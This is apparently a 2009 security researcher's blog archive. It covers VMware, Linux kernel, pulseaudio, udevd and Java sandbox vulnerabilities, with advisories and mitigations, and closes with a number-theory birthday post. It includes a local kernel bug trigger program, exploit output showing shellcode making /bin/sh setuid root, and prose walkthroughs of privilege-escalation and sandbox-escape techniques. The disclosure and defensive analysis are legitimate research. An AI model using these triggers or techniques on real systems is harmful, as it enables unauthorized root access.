Saturday, November 28, 2009

Virtualization security and the Intel privilege model

Earlier this month, Tavis and I spoke at PacSec 2009 in Tokyo about virtualisation security on Intel architectures, with a focus on CPU virtualisation.

During this talk, we briefly explained various techniques used for CPU virtualisation such as dynamic translation (QEmu), VMware-style binary translation or paravirtualisation (Xen) and we went through bugs found by us and others:

- We released some details about MS09-33 (CVE-2009-1542), a bug we found in VirtualPC's instructions decoding
- We mentioned two of the awesome bugs found by Derek Soeder in VMware, CVE-2008-4915 and CVE-2008-4279
- We explained and demo-ed the exploitation of the mishandled exception on page fault bug in VMware that I previously blogged about.
- We released information on CVE-2009-3827, a bug we discovered in Virtual PC's hardware virtualisation.
A funny fact is that the exact same bug was independently uncovered and corrected in KVM later by Avi Kivity (CVE-2009-3722). The reason may be a not perfectly clear Intel documentation about the differences between MOV_DR and MOV_CR events in hardware virtualisation.
This bug has already been addressed by Microsoft in Windows 7 and will get corrected in the next service pack for Virtual PC and Virtual Server.

If you are interested, you can download the slides here.

Friday, October 30, 2009

CVE-2009-2267: Mishandled exception on page fault in VMware

Tavis Ormandy and myself have recently released an advisory for CVE-2009-2267.

This is a vulnerability in VMware's virtual CPU which can lead to privilege escalation in a guest. All VMware virtualisation products were affected, including in hardware virtualisation mode.

In a VMware guest, in the general case, unprivileged (Ring 3) code runs without VMM intervention until an exception or interrupt occurs. An exception to this is Virtual-8086 mode (VM86) where VMware will perform CPU emulation.

When VMware was emulating a far call instruction in VM86 mode, it was using supervisory access to push the CS and IP registers. Because of this, if this operation raisee a Page Fault (#PF) exception, the resulting exception code would be invalid and would have it's user/supervisor flag incorrectly set.

This can be used to confuse a Guest kernel. Moreover, VM86 mode can be used to further confuse the guest kernel because it allows an attacker to load an arbitrary value in the code segment (CS) register.

We wrote a reliable proof of concept to elevate privileges on Linux guests. It turned out to be very easy because of the PNP BIOS recovery code.

For further details, check our advisory, VMware's advisory and the non weaponized PoC (vmware86.c, vmware86.tar.gz), including Tavis' cool CODE32 macro.

Note that VMware silently patches their products until all all of them are updated and then releases an advisory. If you have updated VMware Workstation a few month ago, you were already protected against this vulnerability.

In theory, VMware's Virtual CPU flaws could be treated like Intel or AMD errata and worked around in operating systems. In practice, since VMware's software can be updated, this is unlikely to happen. Moreover, VMware doesn't release full details that could be used to produce work arounds.

If you like virtual CPU vulnerabilities, I suggest that you have a look at Derek Soeder's awesome advisory from last year.

Wednesday, October 14, 2009

Security in Depth for Linux Software

Chris Evans and myself have presented last week at Hack In The Box Malaysia about "Security in Depth for Linux software". You can find the slides here.

The talk was focused on writing good code and sandboxing.

The writing goode code part was using vsftpd as an example, since Chris has got this right for ten years now.

In the second part, we defined sandboxing, which we also call discretionary privilege dropping, as the ability to drop privileges programmatically and without administrative authority on the machine.

We explained some of the conceptual differences between sandboxing in this sense, where the application writer chooses to make part of his code run without certain privileges, and Mandatory Access Control systems, where the application itself doesn't make the policy.

From an application writer perspective, sandboxing facilities are desirable since they will allow your code to run with lower privileges on all machines. On the other hand, MAC is desirable from a system administrator or distribution maintainer perspective as it will allow one policy to rule over many applications and to enforce certain security properties on the system.

While Linux has a fair number of MAC systems available, sandboxing options are for now very limited. There is some hope that the ftrace framework or SELinux bounded types may allow this in the future (see also Adam Langley's post on LSMSB), but this will not be widely available anytime soon.

We demonstrated different ways of overcoming those limitations on readily available Linux kernels, focusing on three designs experimented or used in vsftpd and Chromium.

Wednesday, September 16, 2009

CVE-2009-2793: Iret #GP on pre-commit handling failure: the NetBSD case

A few months ago, Tavis Ormandy and myself have used the fact that iret can fail with a General Protection (#GP) exception before the processor "commits" to user-mode (switches privileges by setting CS) on multiple occasions (more on this at upcoming PacSec)

It's not necessarily obvious that an inter-privilege iret (typically from kernel mode to user mode) can fail before the privilege switch occurs. It's however the case if the restored EIP is past the code segment limits: a #GP exception will be raised while in kernel mode.

When this occurs, an exception is raised from kernel mode with a handler in kernel mode: since there is no privilege level switch, no stack switch occurs and the trap frame will not contain saved stack information.

If an operating system's kernel does not expect this to happen, it may assume a full trap frame with saved stack registers. This is what happens in NetBSD.

An interesting point in the NetBSD case is that due to the lazy handling of the non executable stack emulation, a legitimate program could trigger the bug:
  1. The legitimate program has code on the stack. For instance due to a GCC-genereated trampoline for a nested function.
  2. The stack with be marked as executable but the code segment limit will not be raised yet: on stack execution, the kernel will handle the #GP exception and raise the limit (lazy handling).
  3. A signal handler gets set to this nested function
  4. The kernel delivers a signal to the process and iret to the code on the stack, such raising #GP pre-commit.
You can read our full NetBSD related advisory here (CVE-2009-2793).

Friday, August 28, 2009

CVE-2009-2698: udp_sendmsg() vulnerability

EDIT: p0c73n1 has posted an exploit for this to milw0rm as did, and spender wrote "the rebel"

Tavis Ormandy and myself have recently reported CVE-2009-2698 which has been disclosed at the beginning of the week.

This flaw affects at least Linux 2.6 with a version < 2.6.19.

When we ran into this, we realized the newest kernel versions were not affected by the PoC code we had. The reason for this was that Herbert Xu had found and corrected a closely related bug. Linux distributions running on 2.6.18 and earlier kernels did not realize the security impact of this fix and did not backport it.
This is a good example on how hard it is to backport relevant fixes to maintained stable versions of the kernel.

If you look at udp_sendmsg, you will see that the rt routing table is initialized as NULL and some code paths can lead to call ip_append_data with a NULL rt. ip_append_data() obviously doesn't handle this case properly and will cause a NULL pointer dereference.

Note that this is a data NULL pointer dereference and mapping code at page zero will not lead to immediate privileged code execution for a local attacker. However, controlling the rtable structure seems to give enough control to the attacker to elevate privileges.

Since it's hard to guarantee that ip_append_data will never be called with a NULL *rtp, we believe that this function should be made more robust by using this patch.

Here's one way to trigger this vulnerability locally:

$ cat croissant.c
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

int main(int argc, char **argv)
int fd = socket(PF_INET, SOCK_DGRAM, 0);
char buf[1024] = {0};
struct sockaddr to = {
.sa_family = AF_UNSPEC,
.sa_data = "TavisIsAwesome",

sendto(fd, buf, 1024, MSG_PROXY | MSG_MORE, &to, sizeof(to));
sendto(fd, buf, 1024, 0, &to, sizeof(to));

return 0;

An effective implementation of mmap_min_addr or the UDEREF feature of PaX/GrSecurity would prevent local privilege escalation through this issue.

Thursday, August 13, 2009

Linux NULL pointer dereference due to incorrect proto_ops initializations (CVE-2009-2692)

EDIT2: Here is RedHat's official mitigation recommendation
EDIT3: Brad Spengler also wrote an exploit for this and published it. The bug triggering is based on our exploit which leaked to Brad though the private vendor-sec mailing list. He implements the personality trick Tavis and I published in June to bypass mmap_min_addr and also makes use of a feature that allows any unconfined user to gain the right to map at address zero in Redhat's default SELinux policy. He wrote a reliable shellcode for this one that should work pretty much anywhere on x86 and x86_64 machines.
EDIT4: if you use Debian or Ubuntu on your machine, I have specifically updated the kernelsec Debian/Ubuntu GrSecurity packages to protect against this bug and others.
EDIT5: Zinx wrote an ARM Android root exploit
EDIT6: Ramon de Carvalho Valle wrote a PPC/PPC64/x86_64/i386 exploit

Tavis Ormandy and myself have recently found and investigated a Linux kernel vulnerability (CVE-2009-2692). It affects all 2.4 and 2.6 kernels since 2001 on all architectures. We believe this is the public vulnerability affecting the greatest number of kernel versions.

The issue lies in how Linux deals with unavailable operations for some protocols. sock_sendpage and others don't check for NULL pointers before dereferencing operations in the ops structure. Instead the kernel relies on correct initialization of those proto_ops structures with stubs (such as sock_no_sendpage) instead of NULL pointers.

At first sight, the code in af_ipx.c looks correct and seems to initialize .sendpage properly. However, due to a bug in the SOCKOPS_WRAP macro, sock_sendpage will not be initialized. This code is very fragile and there are many other protocols where proto_ops are not correctly initialized at all (vulnerable even without the bug in SOCKOPS_WRAP), see bluetooth for instance.

So it was decided that instead of patching all those protocols and continue to rely on this very fragile code, sock_sendpage would get patched to check against NULL. This was already the way sock_splice_read and others were handled.

Since it leads to the kernel executing code at NULL, the vulnerability is as trivial as it can get to exploit (edit: that's for local privilege escalation and on Intel architectures): an attacker can just put code in the first page that will get executed with kernel privileges. Our exploit took a few minutes to adapt from a previous one:

$ ./leeches
// ------------------------------------------------------

// sendpage linux local ring0
// ----------------,
// leeches.c:Aug 11 2009
// GreetZ: LiquidK, lcamtuf, Spoonm, novocainated, asiraP, ScaryBeasts, spender, pipacs, stealth, jagger, redpig, Neel and all the other leeches we forgot to mention!
Enjoy some photography while at ring0 @
For our webapp friends, here is an XSS executing at ring 0: javascript:alert(1);
shellcode now executing chmod("/bin/sh", 04755), welcome to ring0
$ sh
# id
uid=1000(julien) gid=1000(julien) euid=0(root)
On x86/x86_64, this issue could be mitigated by three things:
  • the recent mmap_min_addr feature. Note that this feature has known issues until at least See also this LWN article.
  • on IA32 with PaX/GrSecurity, the KERNEXEC feature (x86 only)
  • not implementing affected protocols (a.k.a., reducing your attack surface by disabling what you don't need): PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25, PF_AX25, PF_BLUETOOTH, PF_IUCV, IPPROTO_SCTP/PF_INET6, PF_PPPOX, PF_ISDN, but there may be more. (Update: See RedHat's mitigation)
This patch should be applied to fix this issue.

You can read our advisory here.

Note: this has been featured on Slashdot, OSNews, TheRegister, ZDNet and others

Thursday, July 16, 2009

Old school local root vulnerability in pulseaudio (CVE-2009-1894)

Today was chosen as disclosure day for CVE-2009-1894.

Tavis Ormandy and myself have recently used the fact that pulseaudio was set-uid root to bypass Linux' NULL pointer dereference prevention. This technique is relying on a limitation in the Linux kernel and not on a bug in pulseaudio. But we also found one unrelated bug in pulseaudio.

Since it's set-uid root, we thought we would give pulseaudio a quick look. In the very first lines of main(), you can find the following:

if (!getenv("LD_BIND_NOW")) {
char *rp;

pa_assert_se(rp = pa_readlink("/proc/self/exe"));
pa_assert_se(execv(rp, argv) == 0);

So, pulseaudio is re-executing itself through /proc/self/exe, so that the dynamic linker performs all relocation immediately at load-time.

There is an obvious race condition here. /proc/self/exe is a symbolic link to the actual pathname of the executed command: by creating a hard link to /usr/bin/pulseaudio, we control this pathname, and consequently the file under this pathname. Knowing this, the exploitation is trivial (Note that rename() is atomic, or alternatively note how __d_path() works with deleted entries).

It's also interesting to note that any operation performed on /proc/self/exe is guaranteed by the kernel to be performed on the same inode than the one that got executed (see proc_exe_link), something that two of my colleagues have recently pointed out to me. So if they had re-executed themselves by using /proc/self/exe directly, without going through readlink() first, they would not have been vulnerable. And actually they weren't before, if you read the Changelog, you'll find:

2007-10-29 15:33 lennart * : use real path of binary instead of /proc/self/exe to execute ourselves

Oops! (Thanks to my colleague Mike Mammarella for digging this)

Like the vulnerability in udevd, this is a very good example of a non memory corruption vulnerability which is trivial to exploit very reliably and in a cross-architecture way.

So, why does pulseaudio have the set-uid bit set, you may ask ? For real-time performances reasons it wants to keep CAP_SYS_NICE but will drop all other privileges.

This vulnerability could have been avoided if the principle of least privilege had been followed: Since privileges are not required to re-exec yourself, dropping privileges should have been the first thing pulseaudio did. Here it's only the second thing it does, and it was enough to make most Linux Desktops vulnerable.

If your distribution of choice did not patch this yet, or if you want to reduce your attack surface, you're advised to chmod u-s /usr/bin/pulseaudio. Also note that as with every setuid binary update, you should also check that your users didn't create "backup" vulnerable copies (hardlink), waiting to own your box with known vulnerabilities while you think you are safe from those.

PS: Here are two brain teasers for you:

1. Find a cool way to perform an action after execve() has succeeded in another process, but before main() executes. First, I've used a FD_CLOEXEC read descriptor in a pipe and a SIGPIPE handler, but while it gives good results in practice, there is not guarantee as to when the signal will get delivered. I've finally found (with a hint from Tavis) a 100% reliable way to do it that is always guaranteed to work at first try. Of course, such a level of sophistication is absolutely not needed for this exploit.

2. Since pulseaudio allows you to load arbitrary libraries, it allows you to run arbitrary code with CAP_SYS_NICE as a feature. In the light of NUMA coming to the desktop through QPI, can you do something more interesting than what you would first expect with this?

Friday, June 26, 2009

Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)

EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel.
EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable.
EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895

NULL pointers dereferences are a common security issue in the Linux kernel.

In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard.

In the paradigm of locally exploiting the Linux kernel however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segment both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes in your control. Easy.

This used to not be the case, back in Linux 2.0 when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitely use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand down segment instead of a PAGE_OFFSET segment base, but that's a detail).

Kernel developpers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross architectures) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address that you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice this has been effective enough to make exploitation of many vulnerabilities harder or impossible.

Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as:
  • using brk()
  • creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region
  • obscure system calls such as remap_file_pages
  • putting memory pressure in the address space to let the kernel allocate in this region
  • using the MAP_PAGE_ZERO personality
All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time.

So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel):
if ((addr < mmap_min_addr)
&& !capable(CAP_SYS_RAWIO))
  return -EACCES;
return 0;
Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability ? By executing a setuid binary of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore.
So, how do we get control back ? Using something such as "/bin/su our_user_name" could be tempting, but while this would indeed give us control back, su will drop privileges before giving us control back (it'd be a vulnerability otherwise!), so the Linux kernel will make exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality).

So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many Desktop Linux machines by default: pulseaudio. pulseaudio will drop privileges and let you specify a library to load though its -L argument. Exactly what we needed!

Once we have one page mapped in the forbidden area, it's game over. Nothing will prevent us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection.

Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask and thus is allowed when executing setuid binaries can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content could be useful when exploiting a null pointer vulnerability in a setuid application.

We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask.
PS: Thanks to Robert Swiecki for some help while investigating this.

Thursday, May 28, 2009

Time-stamp counter disabling oddities in the Linux kernel

The time-stamp counter (TSC) is part of the performance monitoring facilities provided on Intel processors. It's stored in a 64-bits MSR. Except for 64-bit wraparound (and of course reset), the TSC is guaranteed to be monotonically increasing by Intel, but not necessarily at a constant rate.
Historically, the TSC increased with every internal processor clock cycle, but now the rate is usually constant (even if the processor changes frequency) and usually equals the maximum processor frequency.

There are multiple ways of reading the value of the TSC MSR, a popular one is the RDTSC instruction. This instruction will load the value into EDX:EAX and is not privileged unless the Time-Stamp Disable (TSD) bit is set in CR4. Most operating systems will not set CR4.TSD on any thread, so programmers are free to use RDTSC in their Ring3 code.

The problem is that the TSC has been used as a tool in the past to mount side channel attacks. Two examples are "Cache Attacks and Countermeasures: the Case of AES" by Osvik, Shamir and Tromer and "Cache missing for fun and profit" by Colin Percival. (Less importantly, it has also been used to create exploits against race conditions in the Linux kernel such as this one)

In an attempt to kill RDTSC as a tool to conduct various mischiefs, Andrea Arcangeli, author of the SECCOMP prctl (that allows a thread to enter a sandboxed "computing mode" where only read, write, exit and sigreturn syscalls are allowed) tried to disable RDTSC by setting CR4.TSD in any thread that runs under seccomp (in 2.6.12).

That's where the oddities begin: I was recently surprised to see that a process I ran under seccomp had actually access to rdtsc. A quick look at the source code of my kernel revealed this:

#ifdef TIF_NOTSC

Note that TIF_NOTSC is not a config option! So I took a look at both thread_info_64.h and thread_info_32.h to discover that in the 64 bits version, TIF_NOTSC was not defined. As a consequence, on a 32 bits kernel, seccomp will disable the TSC in seccomp threads but will not on a 64 bits kernel (even for 32 bits processes). Chris Evans blogged previously about how a seemingly simple security technology such as seccomp could still have bugs. "Here's another one" I thought.

While tracking this bug, I found out that it wasn't a bug but a conscious decision by Andi Kleen to not disable TSC, but only on x86_64 (patch applied in 2.6.14) for performance reasons. I consider this a really odd decision: seccomp behaving differently on 64 bits and 32 bits kernels is a non sense! If you consider TSC disabling a security feature, it has to behave consistently or you should just remove it altogether. Here is a thread, started in November 2005 by Andrea Arcangeli who also regretted the lack of consistency.

But then, in Linux 2.6.23, this feature became impact-free, performance-wise. So at that point, I really consider not having it on x86_64 kernels a bug, not only a strange decision. As I mentioned previously, the bug is due to TIF_NOTSC not being defined for 64 bits kernels.
I wondered if this bug would still be there in recent Linux kernels despite the ongoing i386 and x86_64 merge. It wasn't in 2.6.27 where thread_info_64.h and thread_info_32.h have been merged into one thread_info.h file. But in fact, it was already corrected in 2.6.26 at the same time as a new feature, prctl(PR_SET_TSC), was introduced.

PR_SET_TSC lets you control the CR4.TSD flag for your thread: you can make your thread SIGSEGV on rdtsc. And this feature is another big oddity for me: if you consider rdtsc harmful, it would make sense to let a process drop the privilege to use RDTSC, but the weird thing here is that they don't forbid you to call prctl(PR_SET_TSC) again to clear the TSD flag and restore your privilege to use rdtsc! So I can't imagine what this is for, the only use case I can see would be in a ptrace sandbox.

Another use case would have been SECCOMP of course. By removing the automatic TSC disabling from seccomp, a thread could use PR_SET_TSC prior to using PR_SETCOMP if it wanted to disable rdtsc, thus making this behavior configurable. Since a thread under seccomp cannot call prctl(), the thread wouldn't have been able to re-enable it. But the problem would have been that existing code relying on SECCOMP might be expecting to drop TSC access without having to use PR_SET_TSC. But wait! This feature had never worked in the first place, it was the perfect time to change the behavior and finally fix this bug. Another oddity!

I should also discuss the whole idea of forbidding access to the useful rdtsc instruction in the first place. Could an attacker emulate this with a thread on another processor incrementing a counter manually anyway? Are the RTC, HPET or the gtod_data counter in the vsyscall page useable? How realistic are those side channel attacks in the first place? If they are, when could it become the easiest attack you can perform on a system ? That will be for another post.

Tuesday, May 19, 2009

Write once, own everyone, Java deserialization issues

EDIT3: This vulnerability has been nominated for a Pwnie Award for "best client-side bug"!
EDIT 2: On June 15th 2009, Apple has updated Java on MacOS X with a version that fixes this issue.
EDIT 1: this has been featured on
Slashdot, Ars Technica, ZDNet, OSnews and many others. The focus was on the fact that this is still not fixed on MacOS X. However, keep in mind that you may still be at risk if you use another operating system (Windows, Linux), especially with an outdated version of Java, which is very common. You should disable Java applets in your browser if you can, or at least consider using NoScript.

It is time to talk about my favorite client-side vulnerability ever. Surprisingly (if you know me), this is a Java vulnerability, or rather a class of Java vulnerabilities that allows to completely bypass the Java sandbox and execute arbitrary code remotely in Java enabled web browsers.
This was found by Sami Koivu. He reported the first instance of it (CVE-2008-5353) to Sun on August 1st 2008 and this instance has been fixed by Sun on December 3rd 2008. These vulnerabilities are both technically interesting and have a lot of impact.

Since they share core classes, OpenJDK, GIJ, icedtea and Sun's JRE were all vulnerable at some point. And unfortunately, this vulnerability is still not fixed everywhere yet.

I've been wanting to talk about this for a while. I was holding off, while Apple was working to patch this vulnerability. Unfortunately, it is still not patched in their latest security update from just a few days ago. I believe that since this vulnerability has already been public for almost 6 months, making MacOS X users aware that Java needs to be disabled in their browser is the good thing to do.

As a side note, Sami Koivu and I paired at latest Pwn2own (his vulnerability, my exploit) and owned both Firefox and Safari on MacOS X on day one (Java is there and enabled by default on MacOS X). Unfortunately it fell out of the challenge criterions because the vulnerability had already been reported to Sun and I had already pinged Apple in January about it.

So let's talk about the first reported instance of this class of vulnerabilities, the Calendar deserialization vulnerability.

For legacy reasons, the deserialization of the sun.util.calendar.ZoneInfo object in a java.util.Calendar has to be fine tuned, so the readObject() method in the Calendar class will handle it. However, an applet cannot access sun.util.calendar.ZoneInfo because it is inside "sun" and anything in "sun" has to be trusted for the Java Applet security model to hold.
For this reason the code responsible for the ZoneInfo deserialization has to run with privileges. The code in java.util is trusted and can get more privileges by using a doPrivileged block:
ZoneInfo zi = (ZoneInfo) AccessController.doPrivileged(
new PrivilegedExceptionAction() {
public Object run() throws Exception {
return input.readObject();
if (zi != null) {
zone = zi;
} catch (Exception e) {}

So what does this buy us ? We can craft an input and deserialize objects from it. By deserializing a Calendar, we can get a ZoneInfo object deserialized in a privileged context. Wait! How do they check this is a ZoneInfo object? They let Java's type checking do this for them. So if we carefully craft our input, we can get an arbitrary object deserialized but it'll not get affected to zi unless it's a valid ZoneInfo.

To exploit this, let's find a class that we would be forbidden to instantiate in an Applet because it would allow us to escape from the Java sandbox. The RuntimePermission class is a great source of inspiration. A ClassLoader seems to be exactly what we are looking for! Let's make our own ClassLoader sub-class and override the readObject() method. This method will be called during deserialization. In this method we can affect ourselves (this) to a static variable so that our shiny new ClassLoader doesn't get garbage collected and so that we can use it later.

With our own ClassLoader we can define classes with our own ProtectionDomain (with arbitrary privileges). That's it!

There is more work to do. The overall exploit can be quite complex (mine is over 500 lines but you can make a simpler version) but you get the basic idea.
Also there is the problem of manually crafting the malicious serialized file. In a first version I did this manually by re-implementing the Serialization protocol. Later I found a nice trick: by overriding replaceObject(), you can let Java do all the work for you.

I've mentioned that this was a class of vulnerabilities: the reason is that with this design, every time Java code deserializes an attacker-controlled input in a privileged context, it's a security vulnerability. Sun fixed the Calendar vulnerability (see this patch) by creating a new accessClassInPackage.sun.util.calendar privilege and restricting the doPrivileged block to this, so they didn't fix the whole class of them (more on this in a later post).

That's it for the technical part.

Now why do I think this client-side arbitrary remote code execution vulnerability is more interesting that most others?

First, according to Adobe and Sun, Java is available in 80% to 90% of all web browser, which makes it a nice target.

Secondly, for various reasons, Java is usually poorly updated:
  • The Sun Java update mechanism isn't tied to the operating system update system on the Windows platform. Personal users and companies don't update it often, some of them do have processes in place to deal with Microsoft's patch Tuesdays but don't for other software updates.
  • Many companies are using web applications or Java software that rely on a specific Java version. It may be tedious to update Java because it would break many things. This may be the reason why Apple's Java updates are so infrequent.
  • Some Linux distributions don't support Sun's JRE (proprietary software) despite making it available. When I asked Ubuntu to fix this vulnerability, they fixed OpenJDK quickly but told me the Sun JRE was not supported (despite being available by default on the latest LTS Ubuntu release).
Third, and this is the important point: most other client-side vulnerabilities that can lead to arbitrary code execution, including other Java vulnerabilities are memory corruption vulnerabilities in a component written in native code. Exploiting those reliably can be hard. Especially if you have to deal with multiple operating system versions or with PaX-like protections such as DEP and ASLR.
This one is a pure Java vulnerability. This means you can write a 100% reliable exploit in pure Java. This exploit will work on all the platforms, all the architectures and all the browsers! Mine has been tested on Firefox, IE6, IE7, IE8, Safari and on MacOS X, Windows, Linux and OpenBSD and should work anywhere.

This is close to the holy grail of client-side vulnerabilities.

So MacOS X users, please disable Java in your web browser.
Others: make sure you have updated Java and still disable it in your web browser: it's a huge attack surface and it suffers from many other security vulnerabilities.
Moreover, even without taking into consideration Java vulnerabilities themselves, since the Java plugin allocates all memory as RWX and doesn't opt-in for randomization, a Java applet can be used to bypass ASLR and non executability (DEP on Windows) in browser exploits.

You can also get some information about this vulnerability on Sami Koivu's blog, here and here and a time line for some of the bugs he reported to Sun here.

Wednesday, April 22, 2009

Local bypass of Linux ASLR through /proc information leaks

EDIT2: Thanks to the efforts of Jake Edge who noticed our presentation, /proc/pid/stat information leak is now at least partially patched in mainline kernel, since
EDIT1: This is featured in an LWN article by Jake Edge

Tavis Ormandy and myself talked about locally bypassing address space layout randomization (ASLR) in Linux in a lightning talk at CanSecWest.

From Linux 2.6.12 to Linux 2.6.21, you could completely bypass ASLR when targeting local processes by reading /proc/pid/maps. Since Linux 2.6.22, if you cannot ptrace "pid", then you will see an empty /proc/pid/maps.

It has been known for at least 7 years now that /proc/pid/stat and /proc/pid/wchan could also leak sensitive information. Reading this information has been prevented in GRSecurity since the beginning as well as in this patch.

The question was: could you exploit this information to bypass ASLR in practice?
If you want to find out, it's easy: we've just published the slides and Tavis' tool!

Thursday, April 16, 2009

Interesting vulnerability in udevd

I used to love exploiting memory corruption vulnerabilities. It usually requires some reverse engineering, good knowledge of the underlaying operating system and some ingenuity to write reliable exploits. And if you try to circumvent clever protections such as PaX, it can get very tricky.

But besides kernel vulnerabilities, exploitable memory corruption vulnerabilities these days are mostly buffer overflows. It's a bit monotonous.

I get more excited by other kind of vulnerabilities such as Solaris' telnet -froot or the Debian/OpenSSL fiasco.

Last night, my friend Raph pointed me to this udev flaw. If you read this patch you can notice an extra check in get_netlink_msg():
if ((snl.nl_groups != 1) || (snl.nl_pid != 0))

This checks if the message recieved by udevd had been sent to a specific multicast group (sending to netlink multicast groups is privileged and can only be done with CAP_NET_ADMIN) and also if it was sent from the kernel's unicast address.

From now on, the vulnerability is pretty obvious: before the patch, udevd didn't check the origin of messages it was recieving through netlink.

So can we spoof the kernel and send arbitrary messages to udevd? Yes! And it's easy, it suffices to create a NETLINK socket with the NETLINK_KOBJECT_UEVENT protocol and to send a unicast message to the correct unicast address. In udevd, this address will be the pid of the process who bound the NETLINK socket (udevd's parent). You can easily find it in /proc/net/netlink (thanks Phil)). Et voilà!

My idea to exploit this was to create a 666 device node that would give direct access to a mounted partition and to chmod +s some binary file we control by directly writing to the block device (there are userland tools and lib to do this easily, see debugfs for instance).

Phil also came-up with the idea of replacing /dev/urandom and /dev/random with /dev/zero (so called "debian emulation" backdoor).
Raph then found an even better way: on Ubuntu, Debian and others, you can exploit "95-udev-late.rules" and run arbitrary commands by using the "remove" action.

And that's it for a slick exploit. 40 lines of C (5 lines of Python for Phil). Pretty simple, cross architecture, reliable.
And it can escape chroots and some MAC-constrained environments (as long as you can create netlink sockets).

Saturday, April 4, 2009


Yesterday, a friend of mine turned 26. I know what you're thinking, this is very exciting. Indeed, not every year your age is between a square (5^2) and a cube (3^3)!

How often does this happen? Well actually, Wikipedia states that 26 is the only number between a square and a cube (which is not exactly true, but read on). I thought this was cool, let my friend know in a creepy happy birthday e-mail and got back to work.

But the same day, I was dragged to a Polish club by friends. It was horrible: the music was awful, absolutely nobody was dancing, nobody was talking and nothing happened. I was very bored, so I started working on the demonstration that 26 was the only number between a square and a cube. Excluding the fact that the bouncer seemed worried that I was standing still (and alone, remember) on the dance floor, it was the perfect activity to have in this club.
I first thought it would be easy, but as it turned out the demonstration ended up involving quadratic integer rings and unique factorization domains.

So let's start by demonstrating that 26 is the only number preceded by a square and succeeded by a cube. We want to find all integers a and b such as b^3=a^2+2.
You can easily prove that a and b are odd: if b is even, 2 divides a^2, so 2 divides a and 4 divides a^2. Consequently, 4 divides b^3 - a^2 so 4 divides 2. Impossible. So b is odd, which implies a^2 is odd and a is odd.

Then, my first intuition was to use the known solution to this equation to prove there was no other solution. a^2-5^2=b^3-3^3, so (a-5)(a+5)=(b-3)(b^2+3b+9). But this is tedious, there isn't much you can do with this annoying (b^2+3b+9).
Well this is as far as I've got in the club. I attempted to make others in the club party one more time and then decided to head home and started working on the proof again. Sad Friday night.

When I was in college, I really liked the kind of demonstrations where we used a superset of a given set to prove properties in the first set. Here, we see b^3=a^2+2 and feel hopeless. If only a^2+2 could be factorized... Well, it can be factorized. I didn't spend my youth learning about Cauchy sequences and how to construct R and his algebraic closure C for nothing! So let s be i*sqrt(2) and we have b^3=(a-s)(a+s). But what can we do now ?
I wanted to play with prime numbers, divisors and gcds and now we're stuck with complex numbers. Hold on! It turns out that the set of numbers written in the form x+y*s (with x and y integers), written Z[s] with the usual operations is not only a ring (called a quadratic integer ring), but also an Euclidian domain and that its units are 1 and -1 (proof of this another time). We can still have some fun (for some definitions of fun, including any that would qualify the aforementioned Polish club as fun).

So we now have (a-s)(a+s)=b^3. Let's prove that a-s and a+s are mutually prime. Let g be their gcd. g must divide (a+s) - (a-s) = 2s = -s^3. s is prime in Z[s], so g=+- s^x with x being 0, 1, 2 or 3. But g also divides a+s, if x>0, then s divides a+s and so s divides a. But we already know (from the club, remember), that a is odd. And s (i*sqrt(2)) cannot divide an odd number in Z[s]. So x=0 and a-s and a+s are mutually prime.

Since Z[s] is an Euclidian domain, the fundamental theorem of arithmetic holds (Z[s] is a unique factorization domain): any number in Z[s] can be written as the product of the elements of a unique set of prime numbers (and units). So we can write a-s, a+s and b^3 as products of prime numbers (and units). Since a-s and a+s are mutually prime, a-s and a+s are cubes multiplied by some units. Since 1 and -1 are both cubes, and the only units of Z[s], a-s and a+s are cubes.

So let's write a+s=(m+ns)^3 with m and n integers. We get: a+s=m^3-6mn^2+n*(3m^2-2n^2)s. The unicity of m' and n' such as x = m'+n'*s in Z[s] (with m' and n' in Z) gives: n*(3m^2-2n^2)=1. So n=+-1. If n = 1, we have 3m^2-2=1 and m = +-1. If n =-1 there is no solution for m. So n=1 and m = +-1. We also have a=m^3-6mn^2. So a = 5 or a = -5 wich in turn gives b=3.

So the only integer solutions to b^3=a^2+2 are (a,b)=(5,3) and (a,b)=(-5,3) and 26 is the only integer preceded by a square and followed by a cube.
Happy birthday Parisa!

